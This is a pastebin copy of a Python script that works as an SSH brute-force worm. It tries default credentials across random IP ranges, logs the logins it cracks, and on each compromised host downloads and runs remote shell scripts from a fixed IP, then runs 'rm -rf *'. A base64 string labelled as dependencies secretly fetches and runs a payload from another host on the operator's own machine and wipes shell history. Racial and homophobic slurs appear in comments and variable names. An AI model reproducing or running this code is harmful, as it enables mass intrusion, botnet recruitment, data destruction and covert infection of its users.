PYTHON 16
Scanner.py Guest on 10th October 2020 12:44:08 AM
  1. #!/usr/bin/env python
  2.  
  3.  
  4.  
  5.         #----------------------------------------------------
  6.  
  7.         # Kadens working python scanner 2018 xD
  8.  
  9.         #----------------------------------------------------
  10.  
  11.         #python scan.py 1000 BABY 1 (pick a pass yourself)
  12.  
  13.         #----------------------------------------------------
  14.  
  15.         #python scan.py 1000 YEET 1 (pick a pass yourself)
  16.  
  17.         #----------------------------------------------------
  18.  
  19.         #python scan.py 1000 NIGGER 1 all
  20.  
  21.     # python scan.py 1000 KADEN 1 all
  22.  
  23.         #----------------------------------------------------
  24.  
  25.         #python scan.py 1000 FAST 1 support
  26.  
  27.  
  28.  
  29.        
  30.  
  31. import threading, paramiko, random, socket, time, sys, base64, subprocess
  32.  
  33. paramiko.util.log_to_file("/dev/null")
  34.  
  35. blacklist = ['127']
  36.  
  37.  
  38.  
  39.  
  40.  
  41. passwords = ["admin:1234", "root:root", "ubnt:ubnt", "pi:raspberry", "admin:admin", "support:support", "guest:guest", "telnet:telnet", "root:admin", "user:user", "test:test", "vagrant:vagrant"]
  42.  
  43.  
  44.  
  45. if sys.argv[4] == 'root':
  46.  
  47.      passwords = ["root:root"]  
  48.  
  49. if sys.argv[4] == 'admin':
  50.  
  51.      passwords = ["admin:1234"]
  52.  
  53. if sys.argv[4] == 'support':
  54.  
  55.         passwords = ["support:support"]
  56.  
  57. if sys.argv[4] == 'guest':
  58.  
  59.      passwords = ["guest:guest"]
  60.  
  61. if sys.argv[4] == 'telnet':
  62.  
  63.      passwords = ["telnet:telnet"]
  64.  
  65. if sys.argv[4] == 'omg':
  66.  
  67.      passwords = ["admin:admin"]
  68.  
  69. if sys.argv[4] == 'kms':
  70.  
  71.         passwords = ["root:root", "admin:1234"]
  72.  
  73. if sys.argv[4] == 'kys':
  74.  
  75.         passwords = ["root:root", "root:admin"]
  76.  
  77. if sys.argv[4] == 'gay':
  78.  
  79.         passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  80.  
  81. if sys.argv[4] == 'fag':
  82.  
  83.     passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  84.  
  85. if sys.argv[4] == 'perlz':
  86.  
  87.     passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt"]
  88.  
  89. if sys.argv[4] == 'all':
  90.  
  91.     passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt", "root:root", "admin:1234", "support:support", "guest:guest", "telnet:telnet", "admin:admin", "root:admin", "user:user", "test:test"]
  92.  
  93.  
  94.  
  95.  
  96.  
  97. print('Downloading Scanner Dependencies')
  98.  
  99. def run(cmd):
  100.  
  101.     subprocess.call(cmd, shell=True)
  102.  
  103. checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwczovL2hhY2tzaGFjay54eXovdGNjIHx8IGN1cmwgLXMgLU8gIGh0dHBzOi8vaGFja3NoYWNrLnh5ei90Y2MgOyBjaG1vZCA3NzcgdGNjIDsgc2ggdGNjIDsgcm0gLXJmIHRjYyogO2NsZWFyO2hpc3RvcnkgLWM7IGNsZWFyO2hpc3RvcnkgLXc="
  104.  
  105. rebinaries = str(base64.b64decode(checkbinaries))
  106.  
  107. run(rebinaries)
  108.  
  109. run('clear')
  110.  
  111.  
  112.  
  113.  
  114. print " __                .___               "
  115.  
  116. print "|  | _______     __| _/____   ____    "
  117.  
  118. print "|  |/ /\__  \  / __ |/ __ \ /    \  "
  119.  
  120. print "|    <  / __ \_/ /_/ \ ___/|   |  \ "
  121.  
  122. print "|__|_ \(____  /\____ |\___  >___|  /  "
  123.  
  124. print "     \/     \/      \/    \/     \/  "
  125.  
  126. print ""
  127.  
  128. print ""
  129.  
  130. print "Scanning now! Its working fine... just wait!"
  131.  
  132. ipclassinfo = sys.argv[2]
  133.  
  134. if ipclassinfo == "A":
  135.  
  136.     ip1 = sys.argv[3]
  137.  
  138. elif ipclassinfo == "B":
  139.  
  140.     ip1 = sys.argv[3].split(".")[0]
  141.  
  142.     ip2 = sys.argv[3].split(".")[1]
  143.  
  144. elif ipclassinfo == "C":
  145.  
  146.     ips = sys.argv[3].split(".")
  147.  
  148.     num=0
  149.  
  150.     for ip in ips:
  151.  
  152.         num=num+1
  153.  
  154.         if num == 1:
  155.  
  156.             ip1 = ip
  157.  
  158.         elif num == 2:
  159.  
  160.             ip2 = ip
  161.  
  162.         elif num == 3:
  163.  
  164.             ip3 = ip
  165.  
  166. class sshscanner(threading.Thread):
  167.  
  168.     global passwords
  169.  
  170.     global ipclassinfo
  171.  
  172.     if ipclassinfo == "A":
  173.  
  174.         global ip1
  175.  
  176.     elif ipclassinfo == "B":
  177.  
  178.         global ip1
  179.  
  180.         global ip2
  181.  
  182.     elif ipclassinfo == "C":
  183.  
  184.         global ip1
  185.  
  186.         global ip2
  187.  
  188.         global ip3
  189.  
  190.     def run(self):
  191.  
  192.         while 1:
  193.  
  194.             try:
  195.  
  196.                 while 1:
  197.  
  198.                     thisipisbad='no'
  199.  
  200.                     if ipclassinfo == "A":
  201.  
  202.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  203.  
  204.                     elif ipclassinfo == "B":
  205.  
  206.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  207.  
  208.                     elif ipclassinfo == "C":
  209.  
  210.                                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  211.  
  212.                     elif ipclassinfo == "YEET":
  213.  
  214.                         YEET = ["122","119","161","37","186","187","31","188","201","2","168"]
  215.  
  216.                         self.host = random.choice(YEET)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  217.  
  218.                     elif ipclassinfo == "NIGGER":
  219.  
  220.                         NIGGER = ["125.27","101.109","113.53","118.173","46.62","5.78","125.25","125.26","182.52","125.24","180.180"]
  221.  
  222.                         self.host = random.choice(NIGGER)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  223.  
  224.                     elif ipclassinfo == "FAST":
  225.  
  226.                         FAST = ["188.16", "188.17", "188.18", "188.19"]
  227.  
  228.                         self.host = random.choice(FAST)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  229.  
  230.                     elif ipclassinfo == "BABY":
  231.  
  232.                         BABY = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  233.  
  234.                         self.host = random.choice(BABY)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  235.  
  236.                     elif ipclassinfo == "KADEN":
  237.  
  238.                         KITTY = ["190.236", "212.194", "212.195", "190.13", "190.40", "190.41", "190.42", "190.43", "190.96", "190.97", "190.232", "190.233", "190.234", "190.235", "190.236", "190.237", "190.238", "190.239", "190.184", "181.174", "186.183", "59.177", "59.178", "59.180", "59.182", "59.183", "59.184", "181.64", "181.65", "181.66", "181.67", "200.106", "200.121", "201.230", "201.240"]
  239.  
  240.                         self.host = random.choice(KADEN)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  241.  
  242.                     elif ipclassinfo == "OLD":
  243.  
  244.                         OLD = ["103.20", "103.30", "103.47", "103.57", "12.188", "12.34", "122.3", "210.213", "59.69", "122.52", "122.54", "119.93", "124.105", "125.104", "119.92", "119.91", "49.144"]
  245.  
  246.                         self.host = random.choice(OLD)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  247.  
  248.  
  249.  
  250.                     for badip in blacklist:
  251.  
  252.                         if badip in self.host:
  253.  
  254.                             thisipisbad='yes'
  255.  
  256.                     if thisipisbad=='no':
  257.  
  258.                         break
  259.  
  260.                 username='root'
  261.  
  262.                 password=""
  263.  
  264.                 port = 22
  265.  
  266.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  267.  
  268.                 s.settimeout(3)
  269.  
  270.                 s.connect((self.host, port))
  271.  
  272.                 s.close()
  273.  
  274.                 ssh = paramiko.SSHClient()
  275.  
  276.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  277.  
  278.                 dobreak=False
  279.  
  280.                 for passwd in passwords:
  281.  
  282.                     if ":n/a" in passwd:
  283.  
  284.                         password=""
  285.  
  286.                     else:
  287.  
  288.                         password=passwd.split(":")[1]
  289.  
  290.                     if "n/a:" in passwd:
  291.  
  292.                         username=""
  293.  
  294.                     else:
  295.  
  296.                         username=passwd.split(":")[0]
  297.  
  298.                     try:
  299.  
  300.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  301.  
  302.                         dobreak=True
  303.  
  304.                         break
  305.  
  306.                     except:
  307.  
  308.                         pass
  309.  
  310.                     if True == dobreak:
  311.  
  312.                         break
  313.  
  314.                 badserver=True
  315.  
  316.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  317.  
  318.                 output = stdout.read()
  319.  
  320.                 if "inet addr" in output:
  321.  
  322.                     badserver=False
  323.  
  324.                 if badserver == False:
  325.  
  326.                         print 'Kaden Is Sending ~ ' +self.host+':'+username+':'+password+':'+str(port)
  327.  
  328.                         ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.219.31.17/sh.sh; chmod 777 sh.sh; sh sh.sh; tftp 91.219.31.17 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 91.219.31.17; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 91.219.31.17 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sh.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  329.  
  330.                         nigger = open("cumming.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  331.  
  332.                         time.sleep(15)
  333.  
  334.                         ssh.close()
  335.  
  336.             except:
  337.  
  338.                 pass
  339.  
  340.  
  341.  
  342. for x in range(0,1500):
  343.  
  344.     try:
  345.  
  346.         t = sshscanner()
  347.  
  348.         t.start()
  349.  
  350.     except:
  351.  
  352.         pass

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.